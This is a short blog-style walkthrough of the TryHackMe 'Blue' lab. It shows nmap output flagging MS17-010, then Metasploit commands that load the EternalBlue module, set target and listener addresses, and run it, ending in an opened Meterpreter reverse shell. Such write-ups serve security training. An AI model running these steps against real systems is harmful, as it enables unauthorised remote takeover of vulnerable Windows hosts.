Exploiting MS 17–010 (Blue) in Windows

A51F221B
5 min readJul 22, 2021

--

Deploy the machine from this link: TryHackME blue And if you have not signed up yet, what are you waiting for! Sign up Already! TryHackMe

Exploiting this kind of vulnerability is very simple.All you have to do is start metasploit framework and send the required payload to the target system.

I am assuming that you already have nmap scanned your target machine.These are my scan results : You can see that nmap points out that specified machine is vulnerable to ms 17–010

Nmap scan report for 10.10.57.27
Host is up, received echo-reply ttl 127 (0.24s latency).
Scanned at 2021-01-19 17:40:16 EST for 141s
Not shown: 991 closed ports
Reason: 991 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server? syn-ack ttl 127
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| [http://technet.microsoft.com/en-us/security/bulletin/ms12-020](http://technet.microsoft.com/en-us/security/bulletin/ms12-020)
| [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152)
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| [http://technet.microsoft.com/en-us/security/bulletin/ms12-020](http://technet.microsoft.com/en-us/security/bulletin/ms12-020)
|_ [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

First search for the specified vulnerability in msfconsole.

msf6 > search ms17-010Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

Now use the suitable option .

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

Now set RHOST and LHOST

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.9.156.192
LHOST => 10.9.156.192
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 10.10.57.27

And now exploitation :

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 10.9.156.192:4444 
[*] 10.10.57.27:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.57.27:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.57.27:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.57.27:445 - Connecting to target for exploitation.
[+] 10.10.57.27:445 - Connection established for exploitation.
[+] 10.10.57.27:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.57.27:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.57.27:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.57.27:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.57.27:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.57.27:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.57.27:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.57.27:445 - Sending all but last fragment of exploit packet
[*] 10.10.57.27:445 - Starting non-paged pool grooming
[+] 10.10.57.27:445 - Sending SMBv2 buffers
[+] 10.10.57.27:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.57.27:445 - Sending final SMBv2 buffers.
[*] 10.10.57.27:445 - Sending last fragment of exploit packet!
[*] 10.10.57.27:445 - Receiving response from exploit packet
[+] 10.10.57.27:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.57.27:445 - Sending egg to corrupted connection.
[*] 10.10.57.27:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.57.27
[*] Meterpreter session 1 opened (10.9.156.192:4444 -> 10.10.57.27:49218) at 2021-01-19 18:14:29 -0500
[+] 10.10.57.27:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.57.27:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.57.27:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

If you have done all the above steps correctly the exploit should be successful.

--

--